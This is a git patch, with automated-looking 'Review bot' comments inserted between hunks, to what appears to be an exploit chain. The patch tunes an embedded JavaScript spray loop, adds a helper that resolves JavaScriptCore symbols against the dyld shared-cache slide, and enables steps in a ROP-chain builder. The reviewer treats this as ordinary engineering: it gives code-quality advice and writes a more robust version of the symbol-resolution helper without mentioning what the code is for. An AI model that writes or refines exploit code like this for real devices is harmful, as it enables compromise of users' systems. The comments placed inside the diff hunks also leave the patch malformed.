From d7cf3795b6da29a8ec7a6b7fc1245b70ff9d3dca Mon Sep 17 00:00:00 2001
From: spv
Date: Fri, 22 Apr 2022 15:57:02 -0400
Subject: stuff

---
 src/main.c | 4 ++--
 src/stage2.c | 24 ++++++++++++++----------
 2 files changed, 16 insertions(+), 12 deletions(-)
(limited to 'src')

diff --git a/src/main.c b/src/main.c
index c3e4077..124affa 100644
--- a/src/main.c
+++ b/src/main.c
@@ -334,7 +334,7 @@ int main(int argc,
 "var parent = new Uint8Array(0x100);"
 "var child = new Uint8Array(0x100);"
 " var fuck = new Array();"
-" for (var i = 0; i < 0x200000; i++) {"
+" for (var i = 0; i < 0x10000; i++) {"
 " fuck[i] = i;"
 " }"
 " delete fuck;"
@@ -343,7 +343,7 @@ int main(int argc,
 strlen("var parent = new Uint8Array(0x100);"
 "var child = new Uint8Array(0x100);"
 " var fuck = new Array();"
-" for (var i = 0; i < 0x200000; i++) {"
+" for (var i = 0; i < 0x10000; i++) {"
 " fuck[i] = i;"
 " }"
 " delete fuck;"
diff --git a/src/stage2.c b/src/stage2.c
index 4297e79..8b98a7e 100644
--- a/src/stage2.c
+++ b/src/stage2.c
@@ -230,6 +230,10 @@ uintptr_t get_dyld_shc_sym_addr(char* sym) {
 return dlsym(RTLD_DEFAULT, sym) - get_dyld_shc_slide();
 }
 
+uintptr_t get_dyld_shc_sym_addr_jsc(char* sym) {
+ return dlsym(dlopen("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore", RTLD_LAZY) , sym) - get_dyld_shc_slide();
+}
+
 rop_chain_shit gen_rop_chain(uint32_t base,
 uint32_t we_out_here_addr,
 uint32_t mov_r0,
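Review bot: The JavaScript payload is kept as two identical string-literal sequences, one passed as the script text and one wrapped in `strlen(...)` at the @343 hunk, so the loop-bound change had to be made in both places and the two copies can silently drift apart. Hoisting the literal into one file-scope `static const char js_src[] = "...";` and passing `js_src` together with `sizeof js_src - 1` (or `strlen(js_src)`) keeps the length tied to the text that is actually sent. The enclosing `main` starts and ends outside both hunks.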
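Review bot: `get_dyld_shc_sym_addr_jsc` passes the result of `dlopen()` straight into `dlsym()` with no NULL check, and the NULL that `dlsym()` returns for a missing symbol is not checked either, so a failed load or an unknown name becomes `0 - slide` instead of an error; the five callers at the @305 hunk store the result into `uint32_t` locals without any check. Each call also performs a fresh `dlopen()`, so the library's reference count grows by one per lookup and the handle is never released. Caching the handle in a function-local `static`, checking both calls and reporting through `dlerror()` makes the failure visible at the point it happens; `const char *sym` matches the string-literal arguments, and casting the `void *` before the subtraction avoids relying on GNU `void *` arithmetic. Returning 0 on failure is a sentinel that callers must test.
```c
uintptr_t get_dyld_shc_sym_addr_jsc(const char *sym) {
    static void *jsc_handle;          /* opened once, kept for the process lifetime */
    if (!jsc_handle) {
        jsc_handle = dlopen("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore", RTLD_LAZY);
        if (!jsc_handle) {
            fprintf(stderr, "dlopen(JavaScriptCore) failed: %s\n", dlerror());
            return 0;                 /* sentinel: caller must check */
        }
    }
    void *p = dlsym(jsc_handle, sym);
    if (!p) {
        fprintf(stderr, "dlsym(%s) failed: %s\n", sym, dlerror());
        return 0;
    }
    return (uintptr_t)p - get_dyld_shc_slide();
}
```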
@@ -305,11 +309,11 @@ rop_chain_shit gen_rop_chain(uint32_t base,
 // uint32_t slid_b0i = 0x2b14000;
- uint32_t JSContextGroupCreate = get_dyld_shc_sym_addr("JSContextGroupCreate");
- uint32_t JSGlobalContextCreateInGroup = get_dyld_shc_sym_addr("JSGlobalContextCreateInGroup");
- uint32_t JSContextGetGlobalObject = get_dyld_shc_sym_addr("JSContextGetGlobalObject");
- uint32_t JSStringCreateWithUTF8CString = get_dyld_shc_sym_addr("JSStringCreateWithUTF8CString");
- uint32_t JSEvaluateScript = get_dyld_shc_sym_addr("JSEvaluateScript");
+ uint32_t JSContextGroupCreate = get_dyld_shc_sym_addr_jsc("JSContextGroupCreate");
+ uint32_t JSGlobalContextCreateInGroup = get_dyld_shc_sym_addr_jsc("JSGlobalContextCreateInGroup");
+ uint32_t JSContextGetGlobalObject = get_dyld_shc_sym_addr_jsc("JSContextGetGlobalObject");
+ uint32_t JSStringCreateWithUTF8CString = get_dyld_shc_sym_addr_jsc("JSStringCreateWithUTF8CString");
+ uint32_t JSEvaluateScript = get_dyld_shc_sym_addr_jsc("JSEvaluateScript");
 uint32_t dlsym_ = get_dyld_shc_sym_addr("dlsym");
 MOV_R0(dlsym_);
@@ -317,7 +321,7 @@ rop_chain_shit gen_rop_chain(uint32_t base,
 // uint32_t settimeofday = get_dyld_shc_sym_addr("settimeofday");
-// fprintf(stderr, "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", JSContextGroupCreate, JSGlobalContextCreateInGroup, JSContextGetGlobalObject, JSStringCreateWithUTF8CString, JSEvaluateScript, stime);
+ fprintf(stderr, "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", JSContextGroupCreate, JSGlobalContextCreateInGroup, JSContextGetGlobalObject, JSStringCreateWithUTF8CString, JSEvaluateScript, dlsym_);
 /* MOV_R0(0);
@@ -384,9 +388,9 @@ rop_chain_shit gen_rop_chain(uint32_t base,
 MOV_R1_R0();
 PRINT_STILL_HERE();
-// DEREF_IN_R0(0x144444);
-// MOV_R1_R0();
-// CALL_1ARG(base + printf_addr, base + dyld_shc_base_status);
+ DEREF_IN_R0(0x144444);
+ MOV_R1_R0();
+ CALL_1ARG(base + printf_addr, base + dyld_shc_base_status);
 // CALL_1ARG(base + printf_addr, 0x109000);
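Review bot: The `fprintf` diagnostic at the @317 hunk and the three chain lines at the @384 hunk are switched on and off by commenting code in and out, which is what this commit does and what the `// uint32_t settimeofday` and `// CALL_1ARG(base + printf_addr, 0x109000);` context lines show has happened before; a `#ifdef DEBUG_CHAIN` guard around the diagnostic, or a runtime `verbose` flag, keeps the build reproducible and the history readable. The format string pairs `%08x` with `uint32_t` arguments, which is well-defined where `uint32_t` is `unsigned int`, but `"0x%08" PRIx32` from `<inttypes.h>` states the width exactly and survives a change of target. The values printed are unlabeled, so `"group=0x%08x ctx=0x%08x ..."` would make the output self-describing. The enclosing `gen_rop_chain` starts and ends outside these hunks.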
@@ -397,4 +401,4 @@ rop_chain_shit gen_rop_chain(uint32_t base,
 chain_b0i->chain_len = chain_len * 4;
 return chain_b0i;
-}
\ No newline at end of file
+}
-- 
cgit v1.2.3